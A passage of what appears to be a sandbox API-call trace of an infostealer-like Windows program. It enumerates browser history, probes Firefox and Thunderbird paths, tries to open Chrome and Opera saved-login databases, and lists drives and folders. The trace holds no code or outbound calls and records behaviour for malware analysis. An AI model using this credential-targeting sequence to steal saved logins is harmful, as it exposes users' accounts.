pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.227] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.227] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.227] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.227] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.227] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x0) returned 0x1 [0169.238] IUnknown:Release (This=0x6da548) returned 0x0 [0169.239] IUnknown:Release (This=0x6d7db0) returned 0x1 [0169.239] CoUninitialize () [0169.348] NtEnumerateValueKey (in: KeyHandle=0x1b4, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xddb90, Length=0x800, ResultLength=0xdea48 | out: KeyValueInformation=0xddb90, ResultLength=0xdea48) returned 0x8000001a [0169.348] NtClose (Handle=0x1b4) returned 0x0 [0169.348] RtlFreeHeap (HeapHandle=0x670000, Flags=0x0, BaseAddress=0x851b020) returned 1 [0169.358] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x7374) returned 0x703428 [0169.359] NtCreateKey (in: KeyHandle=0xde9ac, DesiredAccess=0x20219, ObjectAttributes=0xde824*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\Machine\\SOFTWARE\\Mozilla\\Mozilla Firefox\\", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xde9ac*=0x0) returned 0xc0000022 [0169.360] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="ProgramFiles", Value=0xde55c | out: Value="C:\\Program Files (x86)") returned 0x0 [0169.360] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Mozilla Firefox\\Firefox.exe", NtPathName=0xde530, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Mozilla Firefox\\Firefox.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0169.360] NtCreateFile (in: FileHandle=0xde550, DesiredAccess=0x120089, ObjectAttributes=0xde518*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Mozilla Firefox\\Firefox.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde538, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde550*=0x0, IoStatusBlock=0xde538*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0169.361] RtlFreeHeap (HeapHandle=0x670000, Flags=0x0, BaseAddress=0x700100) returned 1 [0169.361] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files\\Mozilla Firefox\\Firefox.exe", NtPathName=0xde530, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Mozilla Firefox\\Firefox.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0169.361] NtCreateFile (in: FileHandle=0xde550, DesiredAccess=0x120089, ObjectAttributes=0xde518*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files\\Mozilla Firefox\\Firefox.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde538, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde550*=0x0, IoStatusBlock=0xde538*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0169.361] RtlFreeHeap (HeapHandle=0x670000, Flags=0x0, BaseAddress=0x6ed930) returned 1 [0169.361] NtCreateKey (in: KeyHandle=0xde9a4, DesiredAccess=0x20219, ObjectAttributes=0xde81c*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\Machine\\SOFTWARE\\Mozilla\\Mozilla Thunderbird\\", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xde9a4*=0x0) returned 0xc0000022 [0169.361] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="ProgramFiles", Value=0xde554 | out: Value="C:\\Program Files (x86)") returned 0x0 [0169.361] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Mozilla Firefox\\Firefox.exe", NtPathName=0xde528, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Mozilla Firefox\\Firefox.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0169.361] NtCreateFile (in: FileHandle=0xde548, DesiredAccess=0x120089, ObjectAttributes=0xde510*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Mozilla Firefox\\Firefox.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde530, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde548*=0x0, IoStatusBlock=0xde530*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0169.362] RtlFreeHeap (HeapHandle=0x670000, Flags=0x0, BaseAddress=0x700808) returned 1 [0169.362] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files\\Mozilla Firefox\\Firefox.exe", NtPathName=0xde528, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Mozilla Firefox\\Firefox.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0169.362] NtCreateFile (in: FileHandle=0xde548, DesiredAccess=0x120089, ObjectAttributes=0xde510*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files\\Mozilla Firefox\\Firefox.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde530, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde548*=0x0, IoStatusBlock=0xde530*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0169.362] RtlFreeHeap (HeapHandle=0x670000, Flags=0x0, BaseAddress=0x6ed4d0) returned 1 [0169.362] RtlFreeHeap (HeapHandle=0x670000, Flags=0x0, BaseAddress=0x703428) returned 1 [0169.363] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="LOCALAPPDATA", Value=0xde60c | out: Value="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0169.363] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data", NtPathName=0xde5e0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0169.364] NtCreateFile (in: FileHandle=0xde600, DesiredAccess=0x120089, ObjectAttributes=0xde5c8*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde5e8, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde600*=0x0, IoStatusBlock=0xde5e8*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0169.364] RtlFreeHeap (HeapHandle=0x670000, Flags=0x0, BaseAddress=0x6fcb90) returned 1 [0169.364] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="APPDATA", Value=0xde55c | out: Value="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0169.364] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera Software\\Opera Stable\\Login Data", NtPathName=0xde540, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera Software\\Opera Stable\\Login Data", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0169.364] NtCreateFile (in: FileHandle=0xde560, DesiredAccess=0x120089, ObjectAttributes=0xde528*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera Software\\Opera Stable\\Login Data", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde548, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde560*=0x0, IoStatusBlock=0xde548*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0169.364] RtlFreeHeap (HeapHandle=0x670000, Flags=0x0, BaseAddress=0x6fc350) returned 1 [0169.365] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="ProgramFiles", Value=0xddc2c | out: Value="C:\\Program Files (x86)") returned 0x0 [0169.376] FindFirstFileW (in: lpFileName="C:\\*", lpFindFileData=0xdd8a4 | out: lpFindFileData=0xdd8a4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xbaec25, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbaec25, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xbaec25, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="$Recycle.Bin", cAlternateFileName="")) returned 0x67ef38 [0169.376] FindNextFileW (in: hFindFile=0x67ef38, lpFindFileData=0xdd8a4 | out: lpFindFileData=0xdd8a4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x7898476d, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78b27f82, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78b27f82, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Boot", cAlternateFileName="")) returned 1 [0169.376] FindNextFileW (in: hFindFile=0x67ef38, lpFindFileData=0xdd8a4 | out: lpFindFileData=0xdd8a4*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xe47a48a8, ftCreationTime.dwHighDateTime=0x1d112ea, ftLastAccessTime.dwLowDateTime=0x78ab5a49, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x2feb42d5, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x61b64, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr", cAlternateFileName="")) returned 1 [0169.376] FindNextFileW (in: hFindFile=0x67ef38, lpFindFileData=0xdd8a4 | out: lpFindFileData=0xdd8a4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xe5533ee0, ftCreationTime.dwHighDateTime=0x1d112ea, ftLastAccessTime.dwLowDateTime=0x78b27f82, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x2feb42d5, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1, dwReserved0=0x0, dwReserved1=0x0, cFileName="BOOTNXT", cAlternateFileName="")) returned 1 [0169.377] FindNextFileW (in: hFindFile=0x67ef38, lpFindFileData=0xdd8a4 | out: lpFindFileData=0xdd8a4*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0x78d17e5a, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78d17e5a, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78d17e5a, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x0, dwReserved1=0x0, cFileName="BOOTSECT.BAK", cAlternateFileName="")) returned 1 [0169.377] FindNextFileW (in: hFindFile=0x67ef38, lpFindFileData=0xdd8a4 | out: lpFindFileData=0xdd8a4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x5d599f22, ftCreationTime.dwHighDateTime=0x1d7005f, ftLastAccessTime.dwLowDateTime=0x5d599f22, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5d599f22, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents and Settings", cAlternateFileName="DOCUME~1")) returned 1 [0169.377] FindNextFileW (in: hFindFile=0x67ef38, lpFindFileData=0xdd8a4 | out: lpFindFileData=0xdd8a4*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x551dbbfd, ftCreationTime.dwHighDateTime=0x1d7005f, ftLastAccessTime.dwLowDateTime=0x551dbbfd, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0xb2b40430, ftLastWriteTime.dwHighDateTime=0x1d7b06c, nFileSizeHigh=0x0, nFileSizeLow=0x332fe000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hiberfil.sys", cAlternateFileName="")) returned 1 [0169.377] FindNextFileW (in: hFindFile=0x67ef38, lpFindFileData=0xdd8a4 | out: lpFindFileData=0xdd8a4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x85890a37, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x85890a37, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xb3819fbe, ftLastWriteTime.dwHighDateTime=0x1d7b06c, nFileSizeHigh=0x0, nFileSizeLow=0x48000000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pagefile.sys", cAlternateFileName="")) returned 1 [0169.377] FindNextFileW (in: hFindFile=0x67ef38, lpFindFileData=0xdd8a4 | out: lpFindFileData=0xdd8a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbaec25, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbaec25, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xbaec25, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PerfLogs", cAlternateFileName="")) returned 1 [0169.377] FindNextFileW (in: hFindFile=0x67ef38, lpFindFileData=0xdd8a4 | out: lpFindFileData=0xdd8a4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x7333933, ftLastAccessTime.dwHighDateTime=0x1d7b06d, ftLastWriteTime.dwLowDateTime=0x7333933, ftLastWriteTime.dwHighDateTime=0x1d7b06d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Program Files", cAlternateFileName="PROGRA~1")) returned 1 [0169.377] FindNextFileW (in: hFindFile=0x67ef38, lpFindFileData=0xdd8a4 | out: lpFindFileData=0xdd8a4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x1b83b055, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x1b83b055, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Program Files (x86)", cAlternateFileName="PROGRA~2")) returned 1 [0169.377] FindNextFileW (in: hFindFile=0x67ef38, lpFindFileData=0xdd8a4 | out: lpFindFileData=0xdd8a4*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xcb9c8f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x387f5bb4, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x387f5bb4, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ProgramData", cAlternateFileName="PROGRA~3")) returned 1 [0169.377] FindNextFileW (in: hFindFile=0x67ef38, lpFindFileData=0xdd8a4 | out: lpFindFileData=0xdd8a4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xbaa998b0, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbadba904, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbadba904, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Recovery", cAlternateFileName="")) returned 1 [0169.377] FindNextFileW (in: hFindFile=0x67ef38, lpFindFileData=0xdd8a4 | out: lpFindFileData=0xdd8a4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x858b6c65, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x858b6c65, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xb384021c, ftLastWriteTime.dwHighDateTime=0x1d7b06c, nFileSizeHigh=0x0, nFileSizeLow=0x10000000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="swapfile.sys", cAlternateFileName="")) returned 1 [0169.377] FindNextFileW (in: hFindFile=0x67ef38, lpFindFileData=0xdd8a4 | out: lpFindFileData=0xdd8a4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x85289733, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x2dbfc137, ftLastAccessTime.dwHighDateTime=0x1d70505, ftLastWriteTime.dwLowDateTime=0x2dbfc137, ftLastWriteTime.dwHighDateTime=0x1d70505, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="System Volume Information", cAlternateFileName="SYSTEM~1")) returned 1 [0169.377] FindNextFileW (in: hFindFile=0x67ef38, lpFindFileData=0xdd8a4 | out: lpFindFileData=0xdd8a4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x3ce179de, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3ce179de, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 1 [0169.377] FindNextFileW (in: hFindFile=0x67ef38, lpFindFileData=0xdd8a4 | out: lpFindFileData=0xdd8a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xd9a60a69, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xd9a60a69, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 1 [0169.377] FindNextFileW (in: hFindFile=0x67ef38, lpFindFileData=0xdd8a4 | out: lpFindFileData=0xdd8a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xd9a60a69, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xd9a60a69, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 0 [0169.377] FindClose (in: hFindFile=0x67ef38 | out: hFindFile=0x67ef38) returned 1 [0169.440] FindFirstFileW (in: lpFileName="D:\\*", lpFindFileData=0xdd8d4 | out: lpFindFileData=0xdd8d4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0169.452] FindFirstFileW (in: lpFileName="E:\\*", lpFindFileData=0xdd8c0 | out: lpFindFileData=0xdd8c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0169.464] FindFirstFileW (in: lpFileName="F:\\*", lpFindFileData=0xdd8ac | out: lpFindFileData=0xdd8ac*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0169.524] FindFirstFileW (in: lpFileName="G:\\*", lpFindFileData=0xdd898 | out: lpFindFileData=0xdd898*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0169.534] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\*", lpFindFileData=0xdd8d4 | out: lpFindFileData=0xdd8d4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x1b83b055, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x1b83b055, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x67f3f8 [0169.534] FindNextFileW (in: hFindFile=0x67f3f8, lpFindFileData=0xdd8d4 | out: lpFindFileData=0xdd8d4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x1b83b055, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x1b83b055, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0169.534] FindNextFileW (in: hFindFile=0x67f3f8, lpFindFileData=0xdd8d4 | out: lpFindFileData=0xdd8d4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xfcb3ec4f, ftLastAccessTime.dwHighDateTime=0x1d7b06c, ftLastWriteTime.dwLowDateTime=0xfcb3ec4f, ftLastWriteTime.dwHighDateTime=0x1d7b06c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Common Files", cAlternateFileName="COMMON~1")) returned 1 [0169.534] FindNextFileW (in: hFindFile=0x67f3f8, lpFindFileData=0xdd8d4 | out: lpFindFileData=0xdd8d4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97199283, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97199283, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0169.534] FindNextFileW (in: hFindFile=0x67f3f8, lpFindFileData=0xdd8d4 | out: lpFindFileData=0xdd8d4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc93a39, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xfcb33d94, ftLastAccessTime.dwHighDateTime=0x1d7b06c, ftLastWriteTime.dwLowDateTime=0xfcb33d94, ftLastWriteTime.dwHighDateTime=0x1d7b06c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Internet Explorer", cAlternateFileName="INTERN~1")) returned 1 [0169.534] FindNextFileW (in: hFindFile=0x67f3f8, lpFindFileData=0xdd8d4 | out: lpFindFileData=0xdd8d4*(dwFileAttributes=0x30, ftCreationTime.dwLowDateTime=0x1b83b055, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0xfcec0c1e, ftLastAccessTime.dwHighDateTime=0x1d7b06c, ftLastWriteTime.dwLowDateTime=0xfcec0c1e, ftLastWriteTime.dwHighDateTime=0x1d7b06c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft Office", cAlternateFileName="MICROS~1")) returned 1 [0169.534] FindNextFileW (in: hFindFile=0x67f3f8, lpFindFileData=0xdd8d4 | out: lpFindFileData=0xdd8d4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc93a39, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xfcb5259e, ftLastAccessTime.dwHighDateTime=0x1d7b06c, ftLastWriteTime.dwLowDateTime=0xfcb5259e, ftLastWriteTime.dwHighDateTime=0x1d7b06c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.NET", cAlternateFileName="MICROS~1.NET")) returned 1 [0169.534] FindNextFileW (in: hFindFile=0x67f3f8, lpFindFileData=0xdd8d4 | out: lpFindFileData=0xdd8d4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xde6b7421, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0xfcb49c26, ftLastAccessTime.dwHighDateTime=0x1d7b06c, ftLastWriteTime.dwLowDateTime=0xfcb49c26, ftLastWriteTime.dwHighDateTime=0x1d7b06c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSBuild", cAlternateFileName="")) returned 1 [0169.534] FindNextFileW (in: hFindFile=0x67f3f8, lpFindFileData=0xdd8d4 | out: lpFindFileData=0xdd8d4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xde6dd69d, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0xfcaed054, ftLastAccessTime.dwHighDateTime=0x1d7b06c, ftLastWriteTime.dwLowDateTime=0xfcaed054, ftLastWriteTime.dwHighDateTime=0x1d7b06c, 